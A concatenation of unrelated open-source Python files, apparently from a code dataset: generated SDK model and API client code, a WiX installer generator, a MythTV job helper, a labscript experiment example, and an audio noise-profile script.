Sets the id of this WorkPlanShift.
ID of the shift. This is required only for the case of updating an existing shift
:param id: The id of this WorkPlanShift.
:type: str
"""
self._id = id
@property
def delete(self):
"""
Gets the delete of this WorkPlanShift.
If marked true for updating an existing shift, the shift will be permanently deleted
:return: The delete of this WorkPlanShift.
:rtype: bool
"""
return self._delete
@delete.setter
def delete(self, delete):
"""
Sets the delete of this WorkPlanShift.
If marked true for updating an existing shift, the shift will be permanently deleted
:param delete: The delete of this WorkPlanShift.
:type: bool
"""
self._delete = delete
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_json(self):
"""
Returns the model as raw JSON
"""
return json.dumps(sanitize_for_serialization(self.to_dict()))
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| StarcoderdataPython |
1964190 | <reponame>design-automation/video-generator
import glob
import os
def get_paths_by_typ(fdr_path,typ):
paths = glob.glob(fdr_path + "\\*.%s" % (typ))
ret_paths = [path for path in paths if not os.path.basename(path).startswith("~$")]
# if (len(paths)==0):
# raise Exception ("No .%s file found in \\%s." % (typ, fdr_path))
return ret_paths
| StarcoderdataPython |
11260381 | import sys
import os
import os.path
import hashlib
import re
import errno
import itertools
import tempfile
import hashlib
import requests
from xml.etree import ElementTree
import xml.sax
from xml.sax.handler import ContentHandler
_this_dir = os.path.dirname(os.path.abspath(__file__))
prefs = { 'verbose': True }
def system(args, dirname=None):
"""
Executes a system command (throws an exception on error)
params
args : [command, arg1, arg2, ...]
dirname : if set, execute the command within this directory
"""
import subprocess
#print args
with open(os.devnull, "w") as nulfp:
# n.b. stderr=subprocess.STDOUT fails mysteriously
import sys
subprocess.check_call(args, stdout=(sys.stdout if prefs['verbose'] else nulfp), stderr=subprocess.STDOUT, shell=False, cwd=dirname)
def add_wix_to_path():
wix_dir = 'WiX.3.11.1'
if not os.path.isdir(os.path.join(_this_dir, 'CAD_Installs', wix_dir)):
system([r'..\src\.nuget\nuget.exe', 'install', '-Version', '3.11.1', 'WiX'], os.path.join(_this_dir))
os.environ['PATH'] = os.path.join(_this_dir, 'CAD_Installs', wix_dir, 'tools') + ';' + os.environ['PATH']
# http://bugs.python.org/issue8277
class CommentedTreeBuilder(ElementTree.XMLTreeBuilder):
def __init__(self, html=0, target=None):
ElementTree.XMLTreeBuilder.__init__(self, html, target)
self._parser.CommentHandler = self.handle_comment
def handle_comment(self, data):
self._target.start(ElementTree.Comment, {})
self._target.data(data)
self._target.end(ElementTree.Comment)
def _adjacent_file(file):
import os.path
return os.path.join(os.path.dirname(os.path.abspath(__file__)), file)
#http://effbot.org/zone/element-lib.htm#prettyprint
def _indent(elem, level=0):
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
_indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def gen_dir_from_vc(src, output_filename=None, id=None, diskId=None, file_map={}):
while src[-1] in ('/', '\\'):
src = src[:-1]
name = os.path.basename(src)
id = id or name.replace('-', '_').replace(' ', '_')
output_filename = output_filename or _adjacent_file(id + ".wxi")
ElementTree.register_namespace("", "http://schemas.microsoft.com/wix/2006/wi")
wix = ElementTree.Element("{http://schemas.microsoft.com/wix/2006/wi}Wix")
SubElement = ElementTree.SubElement
fragment = SubElement(wix, "Fragment")
root_dir = SubElement(fragment, "DirectoryRef")
root_dir.set("Id", id)
component_group = SubElement(fragment, "ComponentGroup")
component_group.set("Id", id)
dirs = {}
def get_dir(dirname):
if dirname == src:
return root_dir
dir_ = dirs.get(dirname)
if dir_ is None:
parent = get_dir(os.path.dirname(dirname))
dir_ = SubElement(parent, 'Directory')
dir_.set('Name', os.path.basename(dirname))
# "Identifiers may contain ASCII characters A-Z, a-z, digits, underscores (_), or periods (.)"
dir_.set('Id', 'dir_' + re.sub('[^A-Za-z0-9_]', '_', os.path.relpath(dirname, '..').replace('\\', '_').replace('.', '_').replace('-', '_')))
# "Standard identifiers are 72 characters long or less."
if len(dir_.attrib['Id']) > 72:
dir_.set('Id', 'dir_' + hashlib.md5(dirname).hexdigest())
dirs[dirname] = dir_
return dir_
import subprocess
# git ls-files should show files to-be-added too
svn_status = subprocess.Popen('git ls-files'.split() + [src], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = svn_status.communicate()
exit_code = svn_status.poll()
if exit_code != 0:
raise Exception('svn status failed: ' + err)
for filename in (line.replace("/", "\\") for line in out.splitlines()):
# print filename
if filename == src or os.path.isdir(filename):
continue
dir_ = get_dir(os.path.dirname(filename))
mapped_filename = file_map.get(os.path.normpath(filename), -1)
if mapped_filename is None:
continue
elif mapped_filename != -1:
filename = mapped_filename
component = SubElement(component_group, 'Component')
component.set('Directory', dir_.attrib['Id'])
component.set('Id', 'cmp_' + hashlib.md5(filename).hexdigest())
file_ = SubElement(component, 'File')
file_.set('Source', filename)
file_.set('Id', get_file_id(filename))
if diskId:
component.attrib['DiskId'] = diskId
_indent(wix)
ElementTree.ElementTree(wix).write(output_filename, xml_declaration=True, encoding='utf-8')
def get_file_id(filename):
return 'fil_' + hashlib.md5(filename).hexdigest()
def download_file(url, filename):
if os.path.isfile(filename):
return
print('Downloading {} => {}'.format(url, filename))
if os.path.dirname(filename):
try:
os.makedirs(os.path.dirname(filename))
except OSError as e:
if e.errno != errno.EEXIST:
raise
r = requests.get(url, stream=True)
r.raise_for_status()
fd, tmp_path = tempfile.mkstemp()
# wix bootstrapper uses SHA1
hash = hashlib.sha1()
with os.fdopen(fd, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
hash.update(chunk)
f.write(chunk)
# n.b. don't use f.tell(), since it will be wrong for Content-Encoding: gzip
downloaded_octets = r.raw._fp_bytes_read
if int(r.headers.get('content-length', downloaded_octets)) != downloaded_octets:
os.unlink(tmp_path)
raise ValueError('Download of {} was truncated: {}/{} bytes'.format(url, downloaded_octets, r.headers['content-length']))
else:
os.rename(tmp_path, filename)
print(' => {} {}'.format(filename, hash.hexdigest()))
class WixProcessingInstructionHandler(ContentHandler):
def __init__(self):
ContentHandler.__init__(self)
self.defines = {}
def processingInstruction(self, target, data):
if target == 'define':
eval(compile(data, '<string>', 'exec'), globals(), self.defines)
elif target == 'include':
pass # TODO
def download_bundle_deps(bundle_wxs):
defines = WixProcessingInstructionHandler()
xml.sax.parse("bundle_defines.xml", defines)
xml.sax.parse("META_bundle_x64.wxs", defines)
def eval_vars(attr):
for name, val in defines.defines.iteritems():
attr = attr.replace('$(var.{})'.format(name), str(val))
return attr
tree = ElementTree.parse(bundle_wxs, parser=CommentedTreeBuilder()).getroot()
ElementTree.register_namespace("", "http://schemas.microsoft.com/wix/2006/wi")
for package in itertools.chain(tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}ExePackage"),
tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}MsuPackage"),
tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}MsiPackage")):
url = eval_vars(package.get('DownloadUrl', ''))
if not url:
continue
filename = eval_vars(package.get('SourceFile', '') or package.get('Name', ''))
download_file(url, filename)
# from https://github.com/wixtoolset/wix3/blob/develop/src/ext/NetFxExtension/wixlib/NetFx4.5.wxs
download_file('http://go.microsoft.com/fwlink/?LinkId=225704', 'redist\\dotNetFx45_Full_setup.exe')
def main(src, output_filename=None, id=None, diskId=None):
add_wix_to_path()
while src[-1] in ('/', '\\'):
src = src[:-1]
name = os.path.basename(src)
id = id or name.replace('-', '_').replace(' ', '_')
output_filename = output_filename or _adjacent_file(id + ".wxi")
import subprocess
def check_call(args):
print " ".join(args)
subprocess.check_call(args)
#subprocess.check_call('set path'.split(), shell=True)
#subprocess.check_call('where heat'.split(), shell=True)
check_call(['heat', 'dir', _adjacent_file(src), '-template', 'fragment', '-sreg', '-scom',
'-o', output_filename, '-ag', '-cg', id, '-srd', '-var', 'var.' + id, '-dr', id, '-nologo'])
ElementTree.register_namespace("", "http://schemas.microsoft.com/wix/2006/wi")
tree = ElementTree.parse(output_filename, parser=CommentedTreeBuilder()).getroot()
tree.insert(0, ElementTree.Comment('generated with gen_dir_wxi.py %s\n' % src))
tree.insert(0, ElementTree.ProcessingInstruction('define', '%s=%s' % (id, os.path.normpath(src))))
parent_map = dict((c, p) for p in tree.getiterator() for c in p)
for file in tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}Component/{http://schemas.microsoft.com/wix/2006/wi}File"):
file_Source = file.get('Source', '')
if file_Source.find('.svn') != -1 or os.path.basename(file_Source) in ('Thumbs.db', 'desktop.ini', '.DS_Store') or file_Source.endswith('.pyc'):
comp = parent_map[file]
parent_map[comp].remove(comp)
for dir in tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}Directory"):
if dir.get('Name', '') == '.svn':
for dirref in tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}DirectoryRef"):
if dirref.get('Id', '') == dir.get('Id', ''):
frag = parent_map[dirref]
parent_map[frag].remove(frag)
parent_map[dir].remove(dir)
if diskId:
for component in tree.findall(".//{http://schemas.microsoft.com/wix/2006/wi}Component"):
component.attrib['DiskId'] = diskId
ElementTree.ElementTree(tree).write(output_filename, xml_declaration=True, encoding='utf-8')
if __name__=='__main__':
main(sys.argv[1])
# download_bundle_deps("META_bundle_x64.wxs")
#heat dir ../runtime/MATLAB/Scenario-matlab-library -template fragment -o Scenario-matlab-library.wxi -gg -cg Scenario_matlab_library -srd -var var.Scenario_matlab_library -dr Scenario_matlab_library
| StarcoderdataPython |
11301757 | #!/usr/bin/env python
"""
Provides user job base class to be used to build user job scripts.
db = MythDB()
j = Job(2353)
Recorded((j.get('chanid'),j.get('starttime')))
"""
from MythTV import MythDB
from MythTV import Job
from MythTV import Recorded
from argparse import ArgumentParser
class UserJob(object):
"""
When subclassing, always call super(SubClassName,self).method() early in any overridden methods.
Subclasses must provide:
<something>
<purpose of something>
<something2>
<purpose of something2>
Subclasses may provide:
<something_else>
<purpose of something_else>
<something_else2>
<purpose of something_else2>
"""
def __init__(self):
"""
Initializes the UserJob object
"""
super(UserJob, self).__init__()
self.jobid = None
self.job = None
self.recorded = None
self.init_parser()
self.build_action_map()
def init_parser(self):
"""
Initializes the ArgumentParser
"""
self.parser = ArgumentParser()
self.parser.add_argument("jobid", type=int, help="MythTV user job identifier (%%JOBID%%)")
def parse_args(self):
"""
"""
self.args = self.parser.parse_args()
self.jobid = self.args.jobid
self.job = Job(self.jobid)
self.verify_job()
self.recorded = Recorded((self.job.chanid,self.job.starttime))
def verify_job(self):
"""
"""
if not(self.job.type & Job.USERJOB):
print "not a user job"
def perform(self):
"""
"""
self.parse_args()
def start(self):
"""
"""
self.job.setStatus(Job.STARTING)
def run(self):
"""
"""
self.start()
self.job.setStatus(Job.RUNNING)
def pause(self):
"""
"""
self.job.setStatus(Job.PAUSED)
def resume(self):
"""
"""
self.job.setStatus(Job.RUNNING)
def stop(self):
"""
"""
self.job.setStatus(Job.STOPPING)
def restart(self):
"""
"""
self.stop()
self.run()
def build_action_map(self):
"""
"""
self.action_map = {
Job.RUN:self.run,
Job.PAUSE:self.pause,
Job.RESUME:self.resume,
Job.STOP:self.stop,
Job.RESTART:self.restart }
if __name__ == "__main__":
UserJob().perform()
| StarcoderdataPython |
11205082 | <reponame>labscript-suite-temp-2-archive/zachglassman-labscript--forked-from--labscript_suite-labscript
#####################################################################
# #
# /example.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program labscript, in the labscript #
# suite (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
import __init__ # only have to do this because we're inside the labscript directory
from labscript import *
from labscript_devices.PulseBlaster import PulseBlaster
from labscript_devices.NI_PCIe_6363 import NI_PCIe_6363
from labscript_devices.NovaTechDDS9M import NovaTechDDS9M
from labscript_devices.Camera import Camera
from labscript_devices.PineBlaster import PineBlaster
from labscript_devices.NI_PCI_6733 import NI_PCI_6733
from labscript_utils.unitconversions import *
# testing
PulseBlaster(name='pulseblaster_0', board_number=0)
ClockLine(name='pulseblaster_0_clockline_fast', pseudoclock=pulseblaster_0.pseudoclock, connection='flag 0')
ClockLine(name='pulseblaster_0_clockline_slow', pseudoclock=pulseblaster_0.pseudoclock, connection='flag 1')
NI_PCIe_6363(name='ni_card_0', parent_device=pulseblaster_0_clockline_fast, clock_terminal='ni_pcie_6363_0/PFI0', MAX_name='ni_pcie_6363_0', acquisition_rate=100e3)
NovaTechDDS9M(name='novatechdds9m_0', parent_device=pulseblaster_0_clockline_slow, com_port="com10")
# Create a BIAS Camera, tirggered to take photos with flag 3 of pulseblaster_0
Camera('andor_ixon_0', pulseblaster_0.direct_outputs, 'flag 3', BIAS_port = 42520, serial_number="0000", SDK="IMAQdx", effective_pixel_size=4.6e-6, exposure_time=.1, orientation='top')
# A second pseudoclock to just clock a NI_PCI_6733 Card
PineBlaster(name='pineblaster_0', trigger_device=ni_card_0, trigger_connection='port0/line15', usbport='COM7')
NI_PCI_6733(name='ni_card_1', parent_device=pineblaster_0.clockline, clock_terminal='ni_pcie_6733_0/PFI0', MAX_name='ni_pci_6733_0')
# Create the output/input channels on the above devices
AnalogOut( 'analog0', ni_card_1, 'ao0', unit_conversion_class=example1) # use the example1 conversion class located in pythonlib/unitconversions/example.py with default paremeters
# same as above, but we are changing some parameters used in the conversion and specifying a prefix to be used with units. You can now program in mA, uA, mGauss, uGauss
AnalogOut( 'analog1', ni_card_1, 'ao1', unit_conversion_class=example1, unit_conversion_parameters={'a':5, 'b':1, 'magnitudes':['m','u']})
AnalogOut( 'analog2', ni_card_0, 'ao2')
AnalogIn( 'input1', ni_card_0, 'ai0')
Shutter( 'shutter1', ni_card_0, 'port0/line1', delay=(0,0))
Shutter( 'shutter2', pulseblaster_0.direct_outputs, 'flag 2', delay=(0,0))
DigitalOut( 'switch', pulseblaster_0.direct_outputs, 'flag 4')
DDS( 'dds1', novatechdds9m_0, 'channel 0')
DDS( 'dds2', novatechdds9m_0, 'channel 1')
StaticDDS( 'dds5', novatechdds9m_0, 'channel 2')
# The next DDS is special because it has the frequency and amplitude calibrated using example2 and example3 classes from pythonlib/unitconversions/example.py
DDS( 'dds3', pulseblaster_0.direct_outputs, 'dds 0', freq_conv_class=example2, freq_conv_params={'a':4, 'b':6}, amp_conv_class=example3, amp_conv_params={'a':2, 'b':22, 'magnitudes':['m']})
DDS( 'dds4', pulseblaster_0.direct_outputs, 'dds 1')
# This sets up the inputs/counters/etc that will monitor
# The first paremeter is the name for the WaitMonitor device
# The second and third paremeters are the device and channel respectively that goes high when a wait begins and low when it ends. This output should be
# physically connected to a counter specified in the next two paremeters.
# The final two paremeters specify the device/channel that is to trigger the pseudoclock if the WAIT instruction hits the specified timeout. The output of
# this channel should be physicaly connect to the external trigger of the master pseudoclock.
WaitMonitor('wait_monitor', ni_card_0, 'port0/line0', ni_card_0, 'ctr0', ni_card_0, 'pfi1')
# A variable to define the acquisition rate used for the analog outputs below.
# This is just here to show you that you can use variables instead of typing in numbers!
# Furthermore, these variables could be defined within runmanager (rather than in the code like this one is)
# for easy manipulation via a graphical interface.
rate = 1e4
# The time (in seconds) we wish the pineblaster pseudoclock to start after
# the master pseudoclock (the pulseblaster)
pineblaster_0.set_initial_trigger_time(1)
# Start the experiment!
start()
# A variable to keep track of time
t = 0
# Analog Acquisitions are acquired at the sample rate specified when the *device* is instantiated (eg NI_PCIE_6363() above)
# Acquire an analog trace on this channel from t=0s to t=1s
input1.acquire('measurement1', 0, 1)
# Acquire an analog trace on this channel from t=3s to t=5s
input1.acquire('measurement2', 3, 5)
# Acquire an analog trace on this channel from t=7s to t=9s
input1.acquire('measurement3', 7, 9)
# Set some initial values (t=0) for DDS 1
dds1.setamp(t, 0.5)
dds1.setfreq(t, 0.6)
dds1.setphase(t, 0.7)
# Set some values for dds2 at t=1s. They will have value '0' before this
# time unless otherwise set
dds2.setamp(t+1, 0.9)
dds2.setfreq(t+1, 1.0)
dds2.setphase(t+1, 1.1)
# dds5 is a "static" DDS. This means its value can only be set once, and
# will be set just before the experiment begins
dds5.setfreq(90*MHz)
dds5.setamp(1)
dds5.setphase(0)
# Have the shutters start in the closed state (t=0)
shutter1.close(t)
shutter2.close(t)
# Analog0 is attached to ni_card_1, which is an NI-pci_6733 card (MAX name ni_pcie_6733_0) clocked by a pineblaster
# The pineblaster is being triggered to start by a pulseblaster, which introduces a delay into the start of output from the NI card
# This is all handled by labscript, and you still specify times from the beginning of the experiment (when the master pseudoclock is started)
# YOU DO NOT HAVE TO TAKE INTO ACCOUNT THE DELAY YOURSELF!!
# You do however need to make sure you do not command output from this device before the device has actually started.
# To do so, make sure no commands happen on this channel before analog0.t0
# (this variable contains the delay time!)
analog0.constant(analog0.t0, 2)
# Set this channel to a constant value
# As this channel is clocked by the master pseudoclock, you can command
# output from t=0
analog2.constant(t, 3)
# Again, this must not start until analog1.t0 or later!
analog1.sine(analog1.t0, duration=6, amplitude=5, angfreq=2*pi,
phase=0, dc_offset=0.0, samplerate=rate)
# Let's increment our time variable!
t += max(1, analog0.t0)
# Open the shutter, enable the DDS, ramp an analog output!
shutter2.open(t)
dds3.enable(t)
analog0.ramp(t, duration=2, initial=2, final=3, samplerate=rate)
# Take a picture
andor_ixon_0.expose('exposure_1', t, 'flat')
andor_ixon_0.expose('exposure_1', t+1, 'atoms')
# Do some more things at various times!
# (these are ignoring the t variable)
def my_ramp(t, *args, **kwargs):
lambda_func = functions.sine_ramp(*args, **kwargs)
return lambda_func(t)
analog2.sine_ramp(t=2.25, duration=3, initial=3, final=4,
samplerate=rate, truncation=0.7)
shutter1.open(t=5.89)
analog2.constant(t=5.9, value=5)
analog2.constant(t=7, value=4)
analog2.constant(t=8, value=5)
t += 9 # set t=10 seconds
# Wait for an external trigger on the master pseudoclock
# Waits must be names
# The timeout defaults to 5s, unless otherwise specified.
# The timeout specifies how long to wait without seeing the external
# trigger before continuing the experiment
t += wait('my_first_wait', t=t, timeout=2)
# Waits take very little time as far as labscript is concerned. They only add on the retirggering time needed to start devices up and get them all in sync again.
# After a wait, labscript time (the t variable here) and execution time (when the hardware instructions are executed on the hardware) will not be the same
# as the wait instruction may take anywhere from 0 to "timeout" seconds,
# and this number is only determined during execution time.
t += 1
# Do something 1s after the wait!
switch.go_high(t)
# Examples programming in different units as specified in the
# unitconversion classes passed as parameters to the channel definition
analog0.constant(t, value=5, units='A')
analog1.constant(t, value=1000, units='mGauss')
dds3.setfreq(t, value=50, units='detuned_MHz')
dds3.setamp(t, value=1.9, units='W')
t += 2
analog0.ramp(t, duration=1, initial=5, final=7, samplerate=rate, units='Gauss')
analog1.constant(t, value=3e6, units='uA')
dds3.setfreq(t, value=60, units='detuned_MHz')
dds3.setamp(t, value=500, units='mW')
t += 2
# Stop at t=15 seconds, note that because of the wait timeout, this might
# be as late as 17s (Plus a little bit of retriggering time) in execution
# time
stop(t)
| StarcoderdataPython |
72954 | #!/usr/bin/env python
# -*- encode: utf-8 -*-
#Copyright 2015 RAPP
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
# Authors: <NAME>
# contact: <EMAIL>
import sys
import time
import os
from scipy.io import wavfile
from rapp_utilities import Utilities
## @class SetNoiseProfile
# Evaluates the noise profile for an audio file
class SetNoiseProfile:
## Performs initializations
def __init__(self):
self.utilities = Utilities()
## Evaluates the audio profile
#
# Handles service callback
# rapp_audio_processing.AudioProcessing#setNoiseProfileCallback
#
# @param user [string] The system user, for environmental variable access
# @param noise_audio_file [string] Noise audio file path
# @param audio_type [string] Noise audio file's type
def setNoise_profile(self, user, noise_audio_file, audio_file_type):
cleanup = []
directory = os.path.expanduser("~/rapp_platform_files/audio_processing/") + user
if not os.path.isdir(directory):
os.makedirs(directory)
com_res = os.system("chmod 777 " + directory)
if com_res != 0:
return "Error: Server chmod malfunctioned"
directory += "/noise_profile/"
if not os.path.isdir(directory):
os.makedirs(directory)
com_res = os.system("chmod 777 " + directory)
if com_res != 0:
return "Error: Server chmod malfunctioned"
noise_profile_file = directory
new_audio = noise_audio_file
if not os.path.isfile(new_audio):
return "Error: The audio file does not exist"
# Making audio compatible to sphinx4
if audio_file_type == 'nao_ogg':
if ".ogg" not in new_audio:
return "Error: ogg type selected but file is of another type"
new_audio += ".wav"
com_res = os.system("sox " + noise_audio_file + " " + new_audio)
if com_res != 0:
return "Error: Server sox malfunctioned"
cleanup.append(new_audio)
elif audio_file_type == "nao_wav_1_ch":
if ".wav" not in new_audio:
return "Error: wav type 1 channel selected but file is of another type"
samp_freq, signal = wavfile.read(new_audio)
if len(signal.shape) != 1:
return "Error: wav 1 ch declared but the audio file has " +\
str(signal.shape[1]) + ' channels'
pass
elif audio_file_type == "nao_wav_4_ch":
if ".wav" not in new_audio:
return "Error: wav type 4 channels selected but file is of another type"
samp_freq, signal = wavfile.read(new_audio)
if len(signal.shape) != 2 or signal.shape[1] != 4:
return "Error: wav 4 ch declared but the audio file has not 4 channels"
new_audio += "_1ch.wav"
com_res = os.system("sox " + noise_audio_file + " -c 1 -r 16000 " + \
new_audio)
if com_res != 0:
return "Error: Server sox malfunctioned"
cleanup.append(new_audio)
else:
success = ''
success = "Non valid noise audio type"
status = self.utilities.cleanup(cleanup)
if status != True:
success += " " + status
return success
noise_profile_uri = directory + "/noise_profile_" + audio_file_type
# Extract noise_profile
com_res = os.system(\
"sox " + new_audio + " -t null /dev/null trim 0.5 2.5 noiseprof "\
+ noise_profile_uri)
if com_res != 0:
return "Error: Server sox malfunctioned"
com_res = os.system("chmod 777 " + noise_profile_uri)
if com_res != 0:
return "Error: Server chmod malfunctioned"
status = self.utilities.cleanup(cleanup)
if status != True:
return status
else:
return "true"
| StarcoderdataPython |
6435671 | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 6
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from isi_sdk_8_1_1.api_client import ApiClient
class SnapshotApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_snapshot_alias(self, snapshot_alias, **kwargs): # noqa: E501
"""create_snapshot_alias # noqa: E501
Create a new snapshot alias. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_alias(snapshot_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotAliasCreateParams snapshot_alias: (required)
:return: CreateSnapshotAliasResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_snapshot_alias_with_http_info(snapshot_alias, **kwargs) # noqa: E501
else:
(data) = self.create_snapshot_alias_with_http_info(snapshot_alias, **kwargs) # noqa: E501
return data
def create_snapshot_alias_with_http_info(self, snapshot_alias, **kwargs): # noqa: E501
"""create_snapshot_alias # noqa: E501
Create a new snapshot alias. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_alias_with_http_info(snapshot_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotAliasCreateParams snapshot_alias: (required)
:return: CreateSnapshotAliasResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_alias'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_snapshot_alias" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_alias' is set
if ('snapshot_alias' not in params or
params['snapshot_alias'] is None):
raise ValueError("Missing the required parameter `snapshot_alias` when calling `create_snapshot_alias`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_alias' in params:
body_params = params['snapshot_alias']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/aliases', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateSnapshotAliasResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_snapshot_changelist(self, snapshot_changelist, **kwargs): # noqa: E501
"""create_snapshot_changelist # noqa: E501
Create a new changelist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_changelist(snapshot_changelist, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotChangelists snapshot_changelist: (required)
:return: CreateSnapshotChangelistResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_snapshot_changelist_with_http_info(snapshot_changelist, **kwargs) # noqa: E501
else:
(data) = self.create_snapshot_changelist_with_http_info(snapshot_changelist, **kwargs) # noqa: E501
return data
def create_snapshot_changelist_with_http_info(self, snapshot_changelist, **kwargs): # noqa: E501
"""create_snapshot_changelist # noqa: E501
Create a new changelist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_changelist_with_http_info(snapshot_changelist, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotChangelists snapshot_changelist: (required)
:return: CreateSnapshotChangelistResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_changelist'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_snapshot_changelist" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_changelist' is set
if ('snapshot_changelist' not in params or
params['snapshot_changelist'] is None):
raise ValueError("Missing the required parameter `snapshot_changelist` when calling `create_snapshot_changelist`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_changelist' in params:
body_params = params['snapshot_changelist']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/changelists', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateSnapshotChangelistResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_snapshot_repstate(self, snapshot_repstate, **kwargs): # noqa: E501
"""create_snapshot_repstate # noqa: E501
Create a new repstates. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_repstate(snapshot_repstate, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotRepstates snapshot_repstate: (required)
:return: CreateSnapshotRepstateResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_snapshot_repstate_with_http_info(snapshot_repstate, **kwargs) # noqa: E501
else:
(data) = self.create_snapshot_repstate_with_http_info(snapshot_repstate, **kwargs) # noqa: E501
return data
def create_snapshot_repstate_with_http_info(self, snapshot_repstate, **kwargs): # noqa: E501
"""create_snapshot_repstate # noqa: E501
Create a new repstates. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_repstate_with_http_info(snapshot_repstate, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotRepstates snapshot_repstate: (required)
:return: CreateSnapshotRepstateResponse
